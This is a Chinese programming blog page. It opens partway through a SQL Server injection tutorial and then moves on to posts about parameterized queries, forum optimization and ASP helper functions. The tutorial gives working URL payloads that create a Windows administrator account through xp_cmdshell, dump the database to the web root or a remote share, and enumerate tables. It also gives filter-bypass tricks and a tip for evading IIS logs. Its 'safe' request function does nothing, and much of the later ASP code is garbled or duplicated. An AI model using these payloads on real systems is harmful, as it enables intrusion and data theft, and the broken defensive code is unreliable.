分号;在SQLServer中表示隔开前后两句语句，--表示后面的语句为注释，所以，这句语句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储过程xp_cmdshell，这个存储过程用于调用系统命令，于是，用net命令新建了用户名为name、密码为password的windows的帐号，接着：
http://Site/url.asp?id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
将新建的帐号name加入管理员组，不用两分钟，你已经拿到了系统最高权限！当然，这种方法只适用于用sa连接数据库的情况，否则，是没有权限调用xp_cmdshell的。
http://Site/url.asp?id=1 ;and db_name()>0
前面有个类似的例子and user>0，作用是获取连接用户名，db_name()是另一个系统变量，返回的是连接的数据库名。
http://Site/url.asp?id=1;backup database 数据库名 to disk=’c:\inetpub\wwwroot\1.db’;--
这是相当狠的一招，从 3 拿到的数据库名，加上某些 IIS 出错暴露出的绝对路径，将数据库备份到 Web 目录下面，再用 HTTP 把整个数据库就完完整整的下载回来，所有的管理员及用户密码都一览无遗！在不知道绝对路径的时候，还可以备份到网络地址的方法（如\\202.96.xx.xx\Share \1.db），但成功率不高。
http://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
前面说过，sysobjects 是 SQLServer 的系统表，存储着所有的表名、视图、约束及其它对象，xtype=’U’ and status>0，表示用户建立的表名，上面的语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二、第三个表名怎么获取？还是留给我们聪明的读者思考吧。
http://Site/url.asp?id=1 ;and (Select Top 1 col_name(object_id(‘表名’),1) from sysobjects)>0
从 5 拿到表名后，用 object_id(‘表名’)获取表名对应的内部 ID，col_name(表名ID,1) 代表该表的第 1 个字段名，将 1 换成 2,3,4...就可以逐个获取所猜解表里面的字段名。

以上 6 点是我研究 SQLServer 注入半年多以来的心血结晶，可以看出，对 SQLServer 的了解程度，直接影响着成功率及猜解速度。在我研究 SQLServer 注入之后，我在开发方面的水平也得到很大的提高，呵呵，也许安全与开发本来就是相辅相成的吧。

第二节、绕过程序限制继续注入

在入门篇提到，有很多人喜欢用’号测试注入漏洞，所以也有很多人用过滤’号的方法来“防止”注入漏洞，这也许能挡住一些入门者的攻击，但对ＳＱＬ注入比较熟悉的人，还是可以利用相关的函数，达到绕过程序限制的目的。

在“ＳＱＬ注入的一般步骤”一节中，我所用的语句，都是经过我优化，让其不包含有单引号的；在“利用系统表注入SQLServer数据库”中，有些语句包含有’号，我们举个例子来看看怎么改造这些语句：

简单的如where xtype='U'，字符U对应的ASCII码是85，所以可以用where xtype=char(85)代替；如果字符是中文的，比如where name='用户'，可以用where name=nchar(29992)+nchar(25143)代替。

第三节、经验小结

有些人会过滤 Select、Update、Delete 这些关键字，但偏偏忘记区分大小写，所以大家可以用 selecT 这样尝试一下。
在猜不到字段名时，不妨看看网站上的登录表单，一般为了方便起见，字段名都与表单的输入框取相同的名字。
特别注意：地址栏的+号传入程序后解释为空格，%2B 解释为 + 号，%25 解释为 % 号，具体可以参考 URLEncode 的相关介绍。
用 Get 方法注入时，IIS 会记录你所有的提交字符串，对 Post 方法做则不记录，所以能用 Post 的网址尽量不用Get。
猜解 Access 时只能用 Ascii 逐字解码法，SQLServer 也可以用这种方法，只需要两者之间的区别即可，但是如果能用 SQLServer 的报错信息把值暴露出来，那效率和准确率会有极大的提高。

防范方法

ＳＱＬ注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为普遍，通常是由于程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。在这里，我给大家一个函数，代替 ASP 中的 Request 函数，可以对一切的 SQL 注入 Say NO，函数如下：

ASP/Visual Basic代码

Function SafeRequest(ParaName,ParaType)
'ParaName:参数名称-字符型
'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符)
Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "参数" & ParaName & "必须为数字型！"
Response.end
End if
Else
ParaValue=replace(ParaValue,"","")
End if
SafeRequest=ParaValue
End function

文章到这里就结束了，不管你是安全人员、技术爱好者还是程序员，我都希望本文能对你有所帮助。（作者：小竹）

有关sql注入

一线风 — 2008-1-30 10:14:28

大家存在5点误区：
1、sql注入比较难防，需要替换select,delete等一打字符
2、忽略DropDownList传来的东西
3、access比sqlserver不安全
4、网站没有显示出错信息就说明网站是安全的
5、忽略post提交的信息

大家存在5点误区：
1、sql注入比较难防，需要替换select,delete等一打字符
其实对于字符型替换再多都没有替换单引号为两个单引号来的好！对于数字型替换再多都没有用，一定要类型转换。

2、忽略DropDownList传来的东西
其实是不对的，一切客户端的东西都是不可信任的（IP都有可能），select下拉框也是！因为可以自己做一个htm提交到服务器。

3、access比sqlserver不安全
安全不安全关键看怎么用，如果sqlserver还是像access一样用，一个sa帐户的话，很明显，sqlserver比access不安全，可以直接得到表名和字段名！access反而倒安全点了，因为只能通过逐位猜解得到。

4、网站没有显示出错信息就说明网站是安全的
当有记录的时候显示记录，没有记录的时候显示找不到任何记录，通过这两种状态就可以猜解字段名了，所以网页不出错不能说明是安全的

5、忽略post提交的信息
很多人对url上传递的东西过滤严格，对于post的东西不理不睬是不对的，post的东西更加容易被注入，因为一般字段比较多

在asp.net中强烈建议通过参数来实现sql而不是sql拼接，因为就算你每一个都过滤百密难有疏
比如：

C#代码

SqlConnection conn=new SqlConnection(System.Configuration.ConfigurationSettings.AppSettings["conn"]);
SqlCommand comm=new SqlCommand("update tb1 set vName=@vName,iAge=@iAge where ID=@id",conn);
SqlParameter parm1=new SqlParameter("@vName",SqlDbType.NVarChar,50);
parm1.Value=((TextBox)e.Item.FindControl("name")).Text;
SqlParameter parm2=new SqlParameter("@iAge",SqlDbType.Int);
parm2.Value=((TextBox)e.Item.FindControl("age")).Text;
SqlParameter parm3=new SqlParameter("@id",SqlDbType.Int);
parm3.Value=this.DataGrid1.DataKeys[e.Item.ItemIndex];
comm.Parameters.Add(parm1);
comm.Parameters.Add(parm2);
comm.Parameters.Add(parm3);
conn.Open();
comm.ExecuteNonQuery();
conn.Close();

这样的代码看起来舒服而且又安全，何乐不为？

Iconspedia-下载和分享Web2.0图标

一线风 — 2008-1-29 16:15:10

Iconspedia是一个专门的图标下载网站，和其他图标下载网站不同的是，Iconspedia是允许匿名上传和下载图标的。每个人都可以成为图标的贡献者。Iconspedia上的图标都非常Web2.0，非常漂亮。提供背景透明的PNG和ico格式下载，图标大小从32*32至256*256不等。

Chinaui编辑：今天介绍的Iconspedia是一个专门的图标下载网站。和我们平时介烧过的一些图标下载站不同，这个网站主要是靠大家自己上传，之前没发现这个不错的地方真的是失职了，hoho。感谢可能吧对该网站做了翔实的介绍。

Iconspedia为上传的图标进行了分类，包括有动物、艺术、商业、电脑、假日、体育等等。你可以很快速得找到需要的图标，如果找不到，可以尝试使用其搜索功能。

其中一些分类：

除了可以单独下载某个图标之外，你还可以打包下载某分类的所有图标。例如下面这些：

再展示一些漂亮的图标：

如果你有漂亮的图标，你可以点击这里上传到Iconspedia和更多人分享。

点此访问Iconspedia

百万级论坛系统设计优化

一线风 — 2006-11-1 10:14:24

自从NB论坛系统发布后，很多人都一直在问我一些与论坛性能优化相关的问题，这两天抽了点时间，整理了一下思路，把过去几年的经验都奉献给大家，就是算是庆祝我进入编程领域十一周年献给大家的一份礼物吧！

[序言]

在贴子数上百万的论坛系统中，性能是非常重要的指标，缺少优化的论坛，性能低下是不用说的，轻则拖慢服务器，重则破坏数据一致性，死锁、超时频繁发生，

甚至引起系统崩溃，导致用户的流失。所以，对论坛的优化是非常必要的，一般对ASP程序优化方法有：优化数据库结构、优化算法、将常用又不经常变动的数据存入

Application，其它的一些方法经试验证实对系统的作用很小，不列入此文讨论范围。

[第一步 - 了解你的论坛]

首先，我们要先了解论坛，知道论坛的瓶颈在什么地方，这些地方一般在1.访问量很大的页面、2.数据处理量比较大的页面，根据对我自己论坛一周统计的结果，

访问量最大的几个页面是：

A.查看贴子(View.asp) 96万页

B.主题列表(Board.asp) 73万页

C.查看资料(Member.asp) 22万页

D.论坛首页(Index.asp) 10万页

再对前面两者进一步分析，发现50%以上的访问量都在第一页，在前三页的访问量占了90%以上。

至于数据处理量方面，只要设计合理，论坛系统是不会进行过多的表的关联或很复杂的运算，所以不用担心这方面的问题。

[第二步 - 优化的常识]

一般我们用服务器处理时间(Process Time)来衡量一个论坛的性能，计算方法：在开始处理时候用Timer()得出开始时间，处理结束时得出结束时间，两个时间

的差即是服务器端处理所需要的时间，单位是秒。一般来说，百万级的论坛都有着10万页面/天的访问量，假设访问量是平均的，而且服务器只有一个论坛在运行，每

个页面给你的处理时间也只有0.8秒(800ms)。加上一般高峰期流量是平均值的两倍左右，也就是说，你要控制在400ms以内，才能保证高峰期的正常访问。

200-400ms的论坛，只能算是及格，60-200ms，算是良好，低于60ms的，才能算是一个优秀的论坛，想自己也设计出一个优秀的论坛吗？继续往下看吧。

[第三步 - 优化方法导论]

A.数据库方面

1.列宽对速度影响很少，Select一个varchar(10)和Select十个varchar(1000)的字符，性能几乎没有差异。

2.text(备注)类型字段的读取比其它类型要慢，特别是在数据量大的时候。

3.数据库大小对速度影响不是很大，如果数据库有三个字段A、B、C，C=A*B，那么，直接读字段C比不建立字段C的时候去读A*B要快，也就是说，适当的冗余能

加快Select的速度。

4.有人觉得读大表肯定是很耗时的操作，其实不然，只要经过Where条件Select出来的记录数不多，速度是很快的，这一点在两个大表的关联也同样适用。

5.在用Select Top N的时候，Where条件尽量让它容易成立，数据库搜索到N个符合条件的记录会自动返回，条件越容易满足需要搜索的记录数越少。

6.其他的类似于数字运算比字符运算快、系统自带函数比用户自定义函数快之类的基本知识就不多说了。

B.索引方面

1.粗略的说，索引能加速Select，拖慢Insert和Update(注:如果索引不是建立在你要Update的字段上是没有影响的)，永远都不要试图将索引建立在经常Insert

而很少Select的表上(比如事件日志表)。

2.索引一般建在经常作为查询条件(即Where)、排序条件(即Order by)的字段上

3.in子查询不会使用索引，尽量使用exists优化

4.like查询，如果第一位是通配符(%或_)，那么该语句也不会使用索引

C.ADO方面

1.对Access来说，把Adodb.Connection对象存在Application中会让程序加速不少，但在SQLServer却基本没差异，估计原因是SQLServer本身有连接池加速。

2.conn.execute创建一个Recordset比rs.open会快一点，但缺点是无法读取text型字段，而且无法获取RecordCount等属性。

3.一次返回一个包含200条记录的记录集，比分开两次返回两个包含100条记录的记录集要快。

[第四步 - 优化前的数据库及算法分析]

[第五步 - 着手优化]

有返回值函数收集～

一线风 — 2006-4-6 10:50:22

[Code]
<%
'--------------------------------- Author information -------------------------------------------------------------
'File : Function.asp
'Version : 0.10.20060404b
'Revision : 2006-4-4 14:08:14
'Author : Atwind(Atwind.Max or 一线风)
'Content : Email:Itwind@163.com BLoghttp://max.69sea.com QQ:478779122
'Company : Web: Http://www.cmfu.com Tel:50504740-5060
'-----------------------------------------------------------------------------------------------------------------
'----有返回函数的类型的相关函数集合
'
''~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

'''----------------------------------------------------------------↓转换字符串为数字，无法转换时结果为0
Public Function GetNum(iStr)
Dim s
s=Trim(""&iStr)
If IsNumeric(s) Then GetNum=Clng(s) Else GetNum=0 End If
End Function

'''----------------------------------------------------------------↓过虑用户提交的Get类型字符串
Public Function GetStr(Str)
If Isnull(Str) Then
GetStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
GetStr = Replace(Str,"'","''")
End Function

'''----------------------------------------------------------------↓ 获得用户IP
Public Function GetIp()
dim vip
vip=Request.ServerVariables("http_x_forwarded_for")
if vip="" or Isnull(vip) then vip=Request.ServerVariables("remote_addr")
GetIp=vip
End Function

'''----------------------------------------------------------------↓过滤26个引起搜索溢出的日文片假名
Public Function EncodeJP(StrHTML)
If StrHTML<>"" Then
StrHTML=Trim(StrHTML)
StrHTML=Replace(StrHTML,"ガ","ガ")
StrHTML=Replace(StrHTML,"ギ","ギ")
StrHTML=Replace(StrHTML,"グ","ア")
StrHTML=Replace(StrHTML,"ゲ","ゲ")
StrHTML=Replace(StrHTML,"ゴ","ゴ")
StrHTML=Replace(StrHTML,"ザ","ザ")
StrHTML=Replace(StrHTML,"ジ","ジ")
StrHTML=Replace(StrHTML,"ズ","ズ")
StrHTML=Replace(StrHTML,"ゼ","ゼ")
StrHTML=Replace(StrHTML,"ゾ","ゾ")
StrHTML=Replace(StrHTML,"ダ","ダ")
StrHTML=Replace(StrHTML,"ヂ","ヂ")
StrHTML=Replace(StrHTML,"ヅ","ヅ")
StrHTML=Replace(StrHTML,"デ","デ")
StrHTML=Replace(StrHTML,"ド","ド")
StrHTML=Replace(StrHTML,"バ","バ")
StrHTML=Replace(StrHTML,"パ","パ")
StrHTML=Replace(StrHTML,"ビ","ビ")
StrHTML=Replace(StrHTML,"ピ","ピ")
StrHTML=Replace(StrHTML,"ブ","ブ")
StrHTML=Replace(StrHTML,"ブ","ブ")
StrHTML=Replace(StrHTML,"プ","プ")
StrHTML=Replace(StrHTML,"ベ","ベ")
StrHTML=Replace(StrHTML,"ペ","ペ")
StrHTML=Replace(StrHTML,"ボ","ボ")
StrHTML=Replace(StrHTML,"ポ","ポ")
StrHTML=Replace(StrHTML,"ヴ","ヴ")
End If
EncodeJP=StrHTML
End Function

'''----------------------------------------------------------------↓过滤HTML/UBB以纯文本显示，带长度参数
Public Function FormatHTML(HtmCode,HtmLen)
If HtmCode<>"" Then
Dim RegX
Set RegX = new RegExp
RegX.IgnoreCase = True
RegX.Global = True
RegX.Pattern = "<(a|select|option|script|style|title)(.*?)>((.| )*?)"
HtmCode = RegX.Replace(HtmCode, " ")
RegX.Pattern = "&(lt|gt|nbsp|quot|copy);"
HtmCode = RegX.Replace(HtmCode, " ")
RegX.Pattern = "<[^>]*>"
HtmCode = RegX.Replace(HtmCode, "")
RegX.Pattern = "\[(img)(.*?)\]((.| )*?)\[/(img)\]"
HtmCode = RegX.Replace(HtmCode, " ")
RegX.Pattern = "\[[^\]]*\]"
HtmCode = RegX.Replace(HtmCode, " ")
HtmCode = Replace(HtmCode,Chr(13)&Chr(10)," ")
RegX.Pattern = "^http://[^ <>]+)"
HtmCode = RegX.Replace(HtmCode, "")
RegX.Pattern = "(　|~|～|`|｀)"
HtmCode = RegX.Replace(HtmCode, " ")
Set RegX=Nothing
FormatHTML = CutStr(HtmCode,HtmLen)
Else
FormatHTML = ""
End If
End Function

'''----------------------------------------------------------------↓过滤HTML左右标签
Public Function UnHTML(Code)
UnHTML = RTrim(Code)
If UnHTML<>Empty Then
UnHTML=Replace(UnHTML,"<","<")
UnHTML=Replace(UnHTML,">",">")
End If
End Function

'''----------------------------------------------------------------↓截取字符串特定长度
Public Function CutStr(Str,StrLen)
CutStr = Trim(Str)
If Len(CutStr)>=StrLen Then CutStr=Left(CutStr,StrLen-1)&"..."
End Function

'''----------------------------------------------------------------↓转换数据库数据为发布时的格式
Public Function HTMLEncode(str)
If Isnull(str) then Exit Function
str = Replace(str,CHR(38),"&") '&
str = Replace(str,CHR(32)," ") '
str = Replace(str,CHR(39),"'")
str = Replace(str,CHR(36),"$")
str = Replace(str, CHR(34),""")
str = Replace(str,">",">")
str = Replace(str,"<","<")
str = Replace(str, CHR(13), "")
str = Replace(str, CHR(9), " ") '&TAB
str = Replace(str, CHR(10) & CHR(10), "

")
str = Replace(str, CHR(10), "
")
HTMLEncode = str
End Function

'''----------------------------------------------------------------↓简化条件判断
Public Function IIf(ByVal blnBool,ByVal strStr1,ByVal strStr2)
If blnBool Then IIf=strStr1 Else IIf=strStr2 End If
End Function

'''----------------------------------------------------------------↓通过时返回用户名，否则返回为空,传参过虑为Chr1|Chr2|Chr3
Public Function IsPass(ByVal str,ByVal arr)
Dim s,arrChr,i
s=str
arrChr=Split(arr,"|")
For i=0 to Ubound(arrChr)
If Instr(s,arrChr(i))>0 Then
Ispass=""
Exit Function
End If
Next
IsPass=s
End Function

%>
[/Code]

我的实用代码收集～

一线风 — 2005-8-18 10:36:11

[code]<%
dim BadWords
BadWords="考,Fuck"

<%
dim BadWords
BadWords="考,Fuck"

'用于信息过滤
Public Function HTMLEncode(strFilter)
If Not IsNull(strFilter) Then
strFilter = replace(strFilter, ">", ">")
strFilter = replace(strFilter, "<", "<")
strFilter = Replace(strFilter, CHR(32), " ") '
strFilter = Replace(strFilter, CHR(9), " ") '
strFilter = Replace(strFilter, CHR(34), """)
'strFilter = Replace(strFilter, CHR(39), "'") '单引号过滤
strFilter = Replace(strFilter, CHR(13), "")
strFilter = Replace(strFilter, CHR(10) & CHR(10), "

")
strFilter = Replace(strFilter, CHR(10), "
")
'strFilter=ChkBadWords(strFilter)
HTMLEncode = strFilter
End If
End Function

''脏话过虑
Public Function ChkBadWords(strBad)
If IsNull(strBad) Then Exit Function
Dim i
BadWords=split(BadWords,",")
For i = 0 To UBound(BadWords)
If InStr(strBad,BadWords(i))>0 Then
strBad = Replace(strBad,BadWords(i),"***")
End If
Next
ChkBadWords = strBad
End Function

' 获得用户真实IP
Public Function RealIP()
RealIP=Request.ServerVariables("http_x_forwarded_for")
if RealIP="" or Isnull(RealIP) then RealIP=Request.ServerVariables("remote_addr")
End Function

'检验字符串
Public Function Checkstr(Str)
If Isnull(Str) Then CheckStr = "" :Exit Function
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function

==============================================

Function strLen(Str) ' 获得字符串的长度, 配合下面的CutStr(Str,LenNum)
If Trim(Str)="" Or IsNull(str) Then Exit Function
Dim P_len,x
P_len=0
StrLen=0
P_len=Len(Trim(Str))
For x=1 To P_len
If Asc(Mid(Str,x,1))<0 Then ' Asc 返回与字符串的第一个字母对应的 ANSI 字符代码
StrLen=Int(StrLen) + 2
Else
StrLen=Int(StrLen) + 1
End If
Next
End Function

Function CutStr(Str,LenNum) ' 截取相应的字符串
Dim P_num
Dim I,X
If StrLen(Str)<=LenNum Then
Cutstr=Str
Else
P_num=0
X=0
Do While Not P_num > LenNum-2
X=X+1
If Asc(Mid(Str,X,1))<0 Then
P_num=Int(P_num) + 2
Else
P_num=Int(P_num) + 1
End If
Cutstr=Left(Trim(Str),X)&"..."
Loop
End If
End Function

'================================================
' 函数名：RelativePath2RootPath
' 作用：转为根路径格式
' 参数：url ----原URL
' 返回值：转换后的URL
'================================================
Function RelativePath2RootPath(url)
Dim sTempUrl
sTempUrl = url
If Left(sTempUrl, 1) = "/" Then
RelativePath2RootPath = sTempUrl
Exit Function
End If

Dim sFilePath
sFilePath = Request.ServerVariables("SCRIPT_NAME")
sFilePath = Left(sFilePath, InstrRev(sFilePath, "/") - 1)
Do While Left(sTempUrl, 3) = "../"
sTempUrl = Mid(sTempUrl, 4)
sFilePath = Left(sFilePath, InstrRev(sFilePath, "/") - 1)
Loop
RelativePath2RootPath = sFilePath & "/" & sTempUrl
End Function
'================================================
' 函数名：RootPath2DomainPath
' 作用：根路径转为带域名全路径格式
' 参数：url ----原URL
' 返回值：转换后的URL
'================================================
Function RootPath2DomainPath(url)
Dim sHost, sPort
sHost = Split(LCase(Request.ServerVariables("SERVER_PROTOCOL")), "/")(0) & "://" & Request.ServerVariables("HTTP_HOST")
sPort = Request.ServerVariables("SERVER_PORT")
If sPort <> "80" Then
sHost = sHost & ":" & sPort
End If
RootPath2DomainPath = sHost & url
End Function
'================================================
' 函数名：CreatePath 必须有FSO
' 作用：CreatePath("UploadImg\") 按月份自动创建文件夹
' 参数：fromPath ----原文件夹路径
'================================================

Function CreatePath(fromPath)
dim objFso,uploadpath
uploadpath = Year(Now) & "-" & Month(Now) '以年月创建上传文件夹，格式：2005-8
On Error Resume Next
Set objFso = CreateObject("Scripting.FileSystemObject")
If objFso.FolderExists(Server.MapPath(fromPath & uploadpath)) = False Then
objFSO.CreateFolder Server.MapPath(fromPath & uploadpath)
End If
If Err.Number = 0 Then
CreatePath =fromPath & uploadpath & "\"
Else
CreatePath = ""
End If
set objFso=nothing
End Function

'================================================
'过程名：PreventRefresh
'作用：防止刷新页面
'================================================
Sub PreventRefresh()
Dim RefreshTime,isRefresh
RefreshTime = 10 '防止刷新时间,单位（秒）
isRefresh = 1 '是否使用防刷新功能，0=否，1=是
If isRefresh = 1 Then
If (Not IsEmpty(Session("RefreshTime"))) And RefreshTime > 0 Then
If DateDiff("s", Session("RefreshTime"), Now()) < RefreshTime Then
Response.Write "
本页面起用了防刷新机制，请不要在"&RefreshTime&"秒内连续刷新本页面
正在打开页面，请稍后……"
Response.End
Else
Session("RefreshTime") = Now()
End If
Else
Session("RefreshTime") = Now()
End If
End If
End Sub

Function Html2Ubb(str)
If Str<>"" And Not IsNull(Str) Then
Dim re,tmpstr
Set re=new RegExp
re.IgnoreCase =True
re.Global=True
re.Pattern = "()":Str = re.Replace(Str,"")
re.Pattern = "(<\/STRONG>)":Str = re.Replace(Str,"")
re.Pattern ="()":Str = re.Replace(Str,"")
re.Pattern ="(<\/TBODY>)":Str = re.Replace(Str,"")
re.Pattern ="( re.Pattern ="(TABLE>)":Str = re.Replace(Str,"table>")
re.Pattern ="( re.Pattern ="(TR>)":Str = re.Replace(Str,"tr>")
re.Pattern ="( re.Pattern ="(TD>)":Str = re.Replace(Str,"td>")
re.Pattern ="( re.Pattern ="(Div>)":Str = re.Replace(Str,"div>")
re.Pattern ="( re.Pattern ="( re.Pattern ="( re.Pattern ="(<\/A>)":Str = re.Replace(Str,"")
re.Pattern ="( re.Pattern ="(<\/FONT>)":Str = re.Replace(Str,"")
re.Pattern = "()":Str = re.Replace(Str, "")
re.Pattern ="(\{)":Str = re.Replace(Str,"{")
re.Pattern ="(\})":Str = re.Replace(Str,"}")
re.Pattern ="(\$)":Str = re.Replace(Str,"$")
re.Pattern = "()":Str = re.replace(Str,"

")
re.Pattern = "()":Str = re.replace(Str,"")
Set Re=Nothing
Html2Ubb = Str
Else
Html2Ubb = ""
End If
End Function
'================================================
'作用：读取图片或者FLASH
'参数：url ----文件URL
' height ----高度
' width ----宽度
'================================================
Function GetFlashAndPic(url,height,width)
Dim sExtName,ExtName,strTemp
sExtName = Split(url, ".")
ExtName = sExtName(UBound(sExtName))
If LCase(ExtName) = "swf" Then
strTemp = ""
Else
strTemp = ""
End If
GetFlashAndPic = strTemp
End Function
%>
<%
' 取随机文件名
Function GetRndFileName(sExt)
Dim sRnd
Randomize
sRnd = Int(900 * Rnd) + 100
GetRndFileName = day(now) & hour(now) & minute(now) & second(now) & sRnd & "." & sExt
End Function

' ============================================
' 格式化时间(显示)
' 参数：n_Flag
' 1:"yyyy-mm-dd hh:mm:ss"
' 2:"yyyy-mm-dd"
' 3:"hh:mm:ss"
' 4:"yyyy年mm月dd日"
' 5:"yyyymmdd"
' ============================================
Function Format_Time(s_Time, n_Flag)
Dim y, m, d, h, mi, s
Format_Time = ""
If IsDate(s_Time) = False Then Exit Function
y = cstr(year(s_Time))
m = cstr(month(s_Time))
If len(m) = 1 Then m = "0" & m
d = cstr(day(s_Time))
If len(d) = 1 Then d = "0" & d
h = cstr(hour(s_Time))
If len(h) = 1 Then h = "0" & h
mi = cstr(minute(s_Time))
If len(mi) = 1 Then mi = "0" & mi
s = cstr(second(s_Time))
If len(s) = 1 Then s = "0" & s
Select Case n_Flag
Case 1
' yyyy-mm-dd hh:mm:ss
Format_Time = y & "-" & m & "-" & d & " " & h & ":" & mi & ":" & s
Case 2
' yyyy-mm-dd
Format_Time = y & "-" & m & "-" & d
Case 3
' hh:mm:ss
Format_Time = h & ":" & mi & ":" & s
Case 4
' yyyy年mm月dd日
Format_Time = y & "年" & m & "月" & d & "日"
Case 5
' yyyymmdd
Format_Time = y & m & d
End Select
End Function
%>

通过Stream对象载入外部文件：）－－模板技术

一线风 — 2005-6-29 13:52:16
实现代码：
[code]
<%
Function LoadTemplate(byval str)
If str="" Or IsNull(str) Then Exit Function
Dim objStream,Template_Dir,Template_File
Template_Dir="Template/"
Template_File=Template_Dir&str&".htm"
On Error Resume Next
Set objStream = Server.CreateObject("ADODB.Stream")
If Err.Number=-2147221005 Then 实现代码：

<%
Function LoadTemplate(byval str)
If str="" Or IsNull(str) Then Exit Function
Dim objStream,Template_Dir,Template_File
Template_Dir="Template/"
Template_File=Template_Dir&str&".htm"
On Error Resume Next
Set objStream = Server.CreateObject("ADODB.Stream")
If Err.Number=-2147221005 Then
Response.Write "非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序
"
Err.Clear
Response.End
End If
With objStream
.Type = 2
.Mode = 3
.Open
.LoadFromFile Server.MapPath(Template_File)
If Err.Number<>0 Then
Response.Write "模板"&Template_File&"无法被打开，请检查该模板是否存在!"
Err.Clear
Response.End
End If
.Charset = "GB2312"
.Position = 2
LoadTemplate = .ReadText
.Close
End With
Set objStream = Nothing
namestr=LoadTemplate
End Function
%>

<%
dim temp
' 调用方法
temp=loadtemplate ("head")
temp=replace(temp,"{$Webname$}", "这就是网站名")
Response.write temp
%>

常用共公函数

一线风 — 2005-6-28 10:16:42
[quote]
<%
Function RealIP() ' 获得IP
dim vip
vip=Request.ServerVariables("http_x_forwarded_for")
if vip="" or Isnull(vip) then
vip=Request.ServerVariables("remote_addr")
end if
Response.Write (vip)
End Function

<%
Function RealIP() ' 获得IP
dim vip
vip=Request.ServerVariables("http_x_forwarded_for")
if vip="" or Isnull(vip) then
vip=Request.ServerVariables("remote_addr")
end if
Response.Write (vip)
End Function
Function Checkstr(Str) '检验字符串
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function
Function isInt(str) ' 是不是为整数,必须为9位以下的数
Dim L,I
isInt=False
If Trim(Str)="" Or IsNull(str) Then Exit Function
str=CStr(Trim(str))
L=Len(Str)
For I=1 To L
If Mid(Str,I,1)>"9" Or Mid(Str,I,1)<"0" Then Exit Function
Next
isInt=True
End Function
Function strLen(Str) ' 获得字符串的长度, 配合下面的CutStr(Str,LenNum)
If Trim(Str)="" Or IsNull(str) Then Exit Function
Dim P_len,x
P_len=0
StrLen=0
P_len=Len(Trim(Str))
For x=1 To P_len
If Asc(Mid(Str,x,1))<0 Then ' Asc 返回与字符串的第一个字母对应的 ANSI 字符代码
StrLen=Int(StrLen) + 2
Else
StrLen=Int(StrLen) + 1
End If
Next
End Function
Function CutStr(Str,LenNum) ' 截取相应的字符串
Dim P_num
Dim I,X
If StrLen(Str)<=LenNum Then
Cutstr=Str
Else
P_num=0
X=0
Do While Not P_num > LenNum-2
X=X+1
If Asc(Mid(Str,X,1))<0 Then
P_num=Int(P_num) + 2
Else
P_num=Int(P_num) + 1
End If
Cutstr=Left(Trim(Str),X)&"..."
Loop
End If
End Function
Function HTMLEncode(Str)
if not isnull(Str) then
Str = replace(Str, ">", ">")
Str = replace(Str, "<", "<")
Str = Replace(Str, CHR(32), " ")
Str = Replace(Str, CHR(9), " ")
Str = Replace(Str, CHR(34), """)
Str = Replace(Str, CHR(39), "'")
Str = Replace(Str, CHR(10) & CHR(10), "
")
Str = Replace(Str, CHR(10), "
")
HTMLEncode = Str
end if
End Function

' 服务器组件检查：
Function CheckObjInstalled(strClassString)
On Error Resume Next
Dim Temp
Err = 0
Dim TmpObj
Set TmpObj = Server.CreateObject(strClassString)
Temp = Err
IF Temp = 0 OR Temp = -2147221477 Then
CheckObjInstalled= "√"
ElseIF Temp = 1 OR Temp = -2147221005 Then
CheckObjInstalled="×"
End IF
Err.Clear
Set TmpObj = Nothing
Err = 0
End Function
' 查看占用文件空间
Function GetTotalSize(GetLocal,GetType)
Dim FSO
Set FSO=Server.CreateObject("Scripting.FileSystemObject")
IF Err<0 Then
Err.Clear
GetTotalSize="服务器关闭FSO，查看占用空间失败"
Else
Dim SiteFolder
IF GetType="Folder" Then
Set SiteFolder=FSO.GetFolder(GetLocal)
Else
Set SiteFolder=FSO.GetFile(GetLocal)
End IF
GetTotalSize=SiteFolder.Size
IF GetTotalSize>1024*1024 Then
GetTotalSize=GetTotalSize/1024/1024
IF inStr(GetTotalSize,".") Then GetTotalSize = Left(GetTotalSize,inStr(GetTotalSize,".")+2)
GetTotalSize=GetTotalSize&" MB"
Else
GetTotalSize=Fix(GetTotalSize/1024)&" KB"
End IF
Set SiteFolder=Nothing
End IF
Set FSO=Nothing
End Function
' 数据库相关操作
Function DateToStr(DateTime,ShowType)
Dim DateMonth,DateDay,DateHour,DateMinute
DateMonth=Month(DateTime)
DateDay=Day(DateTime)
DateHour=Hour(DateTime)
DateMinute=Minute(DateTime)
If Len(DateMonth)<2 Then DateMonth="0"&DateMonth
If Len(DateDay)<2 Then DateDay="0"&DateDay
If Len(DateMinute)<2 Then DateMinute="0"&DateMinute
Select Case ShowType
Case "Y-m-d"
DateToStr=Year(DateTime)&"-"&DateMonth&"-"&DateDay
Case "Y-m-d H:I A"
Dim DateAMPM
If DateHour>12 Then
DateHour=DateHour-12
DateAMPM="PM"
Else
DateHour=DateHour
DateAMPM="AM"
End If
If Len(DateHour)<2 Then DateHour="0"&DateHour
DateToStr=Year(DateTime)&"-"&DateMonth&"-"&DateDay&" "&DateHour&":"&DateMinute&" "&DateAMPM
Case "Y-m-d H:I:S"
Dim DateSecond
DateSecond=Second(DateTime)
If Len(DateHour)<2 Then DateHour="0"&DateHour
If Len(DateSecond)<2 Then DateSecond="0"&DateSecond
DateToStr=Year(DateTime)&"-"&DateMonth&"-"&DateDay&" "&DateHour&":"&DateMinute&":"&DateSecond
Case "YmdHIS"
DateSecond=Second(DateTime)
If Len(DateHour)<2 Then DateHour="0"&DateHour
If Len(DateSecond)<2 Then DateSecond="0"&DateSecond
DateToStr=Year(DateTime)&DateMonth&DateDay&DateHour&DateMinute&DateSecond
Case "ym"
DateToStr=Right(Year(DateTime),2)&DateMonth
Case "d"
DateToStr=DateDay
Case Else
